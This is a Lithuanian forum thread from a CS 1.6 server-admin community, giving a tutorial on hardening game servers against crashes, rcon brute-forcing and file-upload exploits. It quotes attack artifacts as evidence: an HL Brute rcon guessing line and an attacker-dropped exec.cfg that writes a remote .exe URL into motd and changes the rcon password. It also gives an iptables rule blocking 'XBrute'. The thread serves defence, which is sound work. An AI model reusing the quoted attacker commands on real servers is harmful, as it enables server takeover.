[Pamoka] Motd.txt ir kitos serverio apsaugos.

Forumas specialiai skirtas pamokoms kuriant CS 1.6 serverį
User avatar
V1LKAS
Flooderis arba specialistas
Posts: 612
Joined: 2012 Nov 08 12:55
Skype: darius489

[Pamoka] Motd.txt ir kitos serverio apsaugos.

Post by V1LKAS »

Nesu pamokų kūrimo fanas, bet kiek matau reikia. Pamoka gali būti ne visiškai tiksli ir veiksminga, pateiksiu tik mintis, galimus variantus spręsti problemai, todėl vietoj tuščių komentarų geriau pasidalinkite savo informacija, problemų sprendimais.
Visų pirma atsinaujinam klientą bei dproto.Kliento Info čia. http://amxmodx.lt/viewtopic.php?f=19&t=161
Dproto naujausią versiją galite rasti paskutinėse temose http://amxmodx.lt/viewtopic.php?f=7&t=449 arba čia http://c-s.net.ua/forum/topic17628.html
Update 2015-01-18
Daugumos problemų galimą išvengti su SteamCMD, tačiau tada serveris bus tik steam only, kas mums nelabai tinka.

0.2 Pasikeičia motd paveiksliukas ir išsijungia serveris
(Pastebėjau su naujausiom dproto versijomis) 2015-01-18

Problema: Nusiunčia paveikslėlį su scriptu ir išjungia serverį su kill komanda nusiūsta tiesiai į linux serverį.
Pasėkmės: Serverio Lūžimas.
Sprendimas: Atsinaujinti dproto bei pasirūpinti kad server.cfg Fast Upload (Greitas atsiuntimas)

Code: Select all

sv_allowupload "0" 
serverio_pavadinimas/cstrike

Reziume visos trys eilutės turėtų atrodyti taip:

Code: Select all

sv_allowdownload "1"sv_allowupload "0"sv_downloadurl "http://serverio_ip/cstrike/"
0.1 Laužimas su UTF-8 klaida (Kiek žinau dar oficialaus fix' iš steam nėra) 2014-09-08

Problema: Naudoja UTF-8 kaip netinkamą formatą
Pasėkmės: Serverio Lūžimas.
Sprendimas: Įdėti fix'intą plmenu.amxxx pluginą. amxmodx/plugins

Nuoroda į plmenu.sma plugino kodą: http://www.amxmodx.lt/viewtopic.php?p=29881#p29881
Tiesiog nukopijuoti i tuščia .sma failą ir sukompiliuoti localiai.

Kitas variantas šitas moduliukas: http://www.failai.lt/us3ro44nm3zd/utf_fix.rar.htm (Orpeu)

1. AutobuyFix (Nežinau ar naujausias build 5787 susitvarko su tuo, todėl vistiek pateiksiu nes asmeniškai gaunu info loguos apie šio bugo naudojimą)

Problema: Keičia kliento autobuy.txt.
Pasėkmės: Serverio Lūžimas.
Sprendimas: Įdėti autobuyfix.amxx pluginą. configs/plugins.ini

2 .HL Brute.
Problema: Bando atspėti jūsų rcon password, konsolės pvz:

Code: Select all

rcon 500661967 "pass" sv_contact "HL Brute 1.10"
Pasėkmės: Turi rcon valdai serverį, jei esi protingas tai ir duomenų bazę išdumpinsi.
Sprendimas: Yra keli variantai, pradėsiu nuo patikimiausio:

a) Ištrinti rcon password:

Code: Select all

rcon_password ""
b) Keisti rcon password į labai sudėtingą, pvz:

Code: Select all

rcon_password "545asdwqdas5dwqhfjk5456"
c) Įdėti anti_hlbrute_v1.1.Jam reikalingas Orpheu modulis: http://forums.alliedmods.net/showthread.php?t=116393

d) Įdėti string drop'ą į iptables, nukopijuoti tiesiogiai į ssh langą (putty).

Code: Select all

iptables -I INPUT -p udp -m string --algo kmp --string "XBrute" -j DROP
Jeigu pas jus kernel 2.6.18, įrašius viršuje pateiktą eilutę gali mesti error, kuris neranda tam tikro modulio, tačiau tai neturi jokios įtakos.
Jeigu viską padarėte teisingai tai parašius

Code: Select all

iptables -L
, turėtumėte pamatyti tekstą:

Code: Select all

STRING match "XBrute" ALGO name kmp TO 65535
Jeigu visgi pas jus nėra įrašytų iptables, įsirašom jas su:

Code: Select all

apt-get update && apt-get install iptables/etc/init.d/iptables start
Papildomai: Siųlyčiau iš server.cfg rcon password perkelti į amxx.cfg
Bei įdėti limitą rcon spėjimų skaičiui:

Code: Select all

sv_rcon_banpenalty 0sv_rcon_minfailures 3sv_rcon_maxfailures 3sv_rcon_minfailuretime 30
3. HLDS Fake Players Flood.
Problema: Serverio floodinimas netikrais žaidėjais.
Pasėkmės: Serverio lagas/lūžimas.
Sprendimas: aarnas pamoka http://amxmodx.lt/viewtopic.php?f=19&t=2577

4. Color Transit chat Bug. Littel_Exploit
Problema: say %s %d chat buginimas.
Pasėkmės: Pakimba žaidėjai, nesimato dalies chat ir Hud tekstų.
Sprendimas: Įsidėti colored_translit.amxx configs/plugins.ini , colored_translit folderį į scripting, nes kitaip nekompiliuos.

5. Motd.txt keitimas, .cfg failų nusiuntimas į serverį. Raiz0 Exploit
Problema: Nusiunčia failus į serverį .cfg, kurie keičia rcon pasword. exec.cfg pavyzdys po Exploit panaudojimo:

Code: Select all

motdfile motd.txtmotd_write http://31.200.239.201/cstrike.exeamxx pause rcon_defencer amxx rcon_password Evil_guy
Pasėkmės: Tokios pat kaip su Problema Nr.2
Sprendimas: Variantų gana nemažai, bet ne visi patikrinti bei ne 100% Patikimumas.

a) Visų pirma reikia atsikratyti į serverį atsiųstais failais, bet prieš ką nors darant būtinai išjunkite serverį.

Code: Select all

cstrike/addons/metamod
- direktorijoje exec.cfg failą ištriname.

Code: Select all

cstrike/addons/amxmodx/configs/maps
- direktorijoje ištrinam main.cfg, prefix_cs.cfg, prefix_de.cfg bei kitus .cfg failus su įtartinu turiniu.

Papildomai siųlyčiau patikrinti visas direktorijas ar kur nors kitur nėra įtartinų .cfg failų.
WinSCP: ALT+F7 search laukelyje, paieškokite exec.cfg, autoexec.cfg failų.

b) Keičiame failų/folderių priegos teises. cmod 0444 (0444 = 444).
Sudedame cmod 444 ant failų server.cfg motd.txt, bei ant direktorijų metamod, configs/maps.
Pavyzdys su WinSCP: Properties-Permissions, laukelyje parašyti 0444 arba palikti varneles prie R.

Pavyzdys su ssh(putty):

Code: Select all

chmod -R 444 metamod
c) Įdėti redaguotą Crock engine_i686.so engine failą.
Linux: engine_i686.7z
Win: swds_p2.7z


d) Išjungti motd langą.
https://forums.alliedmods.net/showthread.php?t=105242

e) Forume radau, kad kažkam neva padėjo tai, nors nelabai tikėtina:

Code: Select all

<html><frameset cols="*" framespacing="0" frameborder="no" border="0"><frame src="http://saitas.lt/folderis/motd.html" name="frame_main" /></frameset>
f) Dedam filewatcher pluginą, kuris saugo/tikrina failus. Logs folderyje spausdinama visa plugino veikla.
Jam taipogi reikalingas Orpheu modulis, kur parsiųsti minėjau anksčiau. Orpheu versija būtina 2.3, su 2.5 neveiks.

Failo nuoroda:
http://amxmodx.lt/viewtopic.php?f=19&t=3207

FS_Open failą dedam į orpheu folderį, filewatcher.cfg į amxmodx/configs, filewatcher.amxx į plugins folderį.

g) Jeigu asmuo jus hackinantis yra protingas, jis sugebės užblokuoti, išjungti pluginus, kuriais nuo to ginatės, tiesiog nuskaitydamas jūsų plugin direktoriją ir atsirinkdamas, kurie failai atlieka blokavimo funkciją, tai pasiūlymas būtų toks, keisti .amxx failų pavadinimus į nesukeliančius įtarimo, pvz:

Code: Select all

more_dmg.amxx fire_in_the_hole.amxx 
Arba galite tiesiog išjungti amx_pausecfg komandą išjundami pluginą plugins.ini

Code: Select all

;pausecfg.amx
h) Dar vienas galimas variantas, plugino pagalba paleisti, motd kitokiu pavadinimu, kad "hackeris" nerastų orginalaus motd.txt
Prisegiau 2 failus: kitą motd, ir pluginuką jo naudojimui, .txt pavadinimą pakeitus, būtinai pakeiskite ir .sma faile pavadinimą:

Code: Select all

server_cmd("second_motd.txt")
6. Nuotolinis motd.

Idėja būtų tokia, motd failą pasiekti nuotoliniu budu, kokiame nors ftp naudojantis pluginu, deja tokio neradau, bet manau tikrai įmanoma sukurti, pačiam deja kol kas neužtenka įgudzių. Galbūt mūsų geriausieji aarnas ir hleV padės šiuo klausimu.

Kaip ir minėjau pateikite savo variantus, kaip tvarkotės su įvairiais exploit.
Attachments
engine_i686.7z
Linux.
(288.08 KiB) Downloaded 734 times
swds_p2.7z
Win.
(614.02 KiB) Downloaded 644 times
anti_hlbrute_v1.1.zip
(474.98 KiB) Downloaded 866 times
colored_translit_fix_bag.zip
(8.78 KiB) Downloaded 709 times
autobuyfix.7z
(6.51 KiB) Downloaded 707 times
Last edited by V1LKAS on 2015 Feb 08 15:23, edited 17 times in total.

User avatar
aaarnas
Vyr. diskusijų administratorius
Posts: 3891
Joined: 2010 Aug 31 13:21
Skype: fiarno
Contact:

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by aaarnas »

Šaunu, sticked.
Palikau CS pasaulį ;/ . Nebepasiekiamas.

GhostMan
Gana aktyvus vartotojas
Posts: 311
Joined: 2012 Jun 30 17:52

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by GhostMan »

cmod 0444 ir cmod 444 kuom nors skiriasi?
Last edited by GhostMan on 2013 Jun 30 18:59, edited 1 time in total.
NWK.LT Counter-Strike 1.6 Serveriai:
  • War3FT ★ [url=steam://connect/cs.nwk.lt:27015]cs.nwk.lt:27015[/url]
  • JailBreak ★ [url=steam://connect/cs.nwk.lt:27016]cs.nwk.lt:27016[/url]
  • Public ★ [url=steam://connect/cs.nwk.lt:27017]cs.nwk.lt:27017[/url]
  • DeathRun ★ [url=steam://connect/cs.nwk.lt:27018]cs.nwk.lt:27018[/url]
  • Hide'N'Seek ★ [url=steam://connect/cs.nwk.lt:27019]cs.nwk.lt:27019[/url]

User avatar
Giltinas
Jau po truputį tampa savu
Posts: 149
Joined: 2012 Jan 03 21:38
Skype: edgaras9512
Location: Šilutė

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by Giltinas »

GhostMan wrote:cmod 0444 ir cmod 444 kuom nors skiriasi?
Nesiskiria.
Image

User avatar
xDede
Jau po truputį tampa savu
Posts: 113
Joined: 2011 Jun 01 19:30
Skype: cicinas2
Location: Telsiai
Contact:

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by xDede »

O krtais skiresi ne tipu, sftp chmod 0444 o ftp chmod 444? :S:

User avatar
V1LKAS
Flooderis arba specialistas
Posts: 612
Joined: 2012 Nov 08 12:55
Skype: darius489

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by V1LKAS »

xDede wrote:O krtais skiresi ne tipu, sftp chmod 0444 o ftp chmod 444? :S:
Skirtumas tik tas per kur pasiekiamas serveris, ar per command menu ar per ftp. be to ftp ir swift ftp (sftp) neturi jokio skirtumo (jokios skirtingos sintaksės) permisions valdyme. Todėl i have no idea that u are talking about
Atnaujinau 6 punktą su g), h) dalimis bei prisidegu reikiamą failą, kadangi pagrindiniam poste jau limitas, tikiuosi administracija priseks prie jo, o aš kol kas palieku čia.
Attachments
motd.rar
(301 Bytes) Downloaded 647 times

User avatar
hleV
AMX Mod X ekspertai
Posts: 875
Joined: 2011 Apr 02 11:23
Skype: hlev.lt
Location: Šiauliai

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by hleV »

Nepridėtas autobuyfix.sma, yra tik .amxx.
Image ← RIP best userbar
DISKUSIJA: KIETAS PLUGIN'O UŽSAKOVAS
Privačios pagalbos neteikiu!

User avatar
V1LKAS
Flooderis arba specialistas
Posts: 612
Joined: 2012 Nov 08 12:55
Skype: darius489

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by V1LKAS »

Ačiū kad pažiūrėjai, prisegu, -beta update šita problema sutvarkyta, bet visgi tiems kurie naudoja senesnį build gal pravers.
Attachments
autobuy_fix.sma
(2.47 KiB) Downloaded 1063 times

User avatar
laimiukas3
Moderatorius
Posts: 4569
Joined: 2012 Aug 03 01:12
Skype: laimiukas3
Location: Vilnius
Contact:

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by laimiukas3 »

Image
Image
Image

Azero
O taip. Jis jau surinko 50 žinučių!
Posts: 98
Joined: 2011 Apr 03 14:38
Skype: Azero8

Re: [Pamoka] Motd.txt ir kitos apsaugos.

Post by Azero »

Jeigu as is server.cfg rcon esu istrynes, o irasiau ji i paleidimo eilute visvien ji gali suzinot?
Image

Post Reply

Who is online

Users browsing this forum: No registered users and 7 guests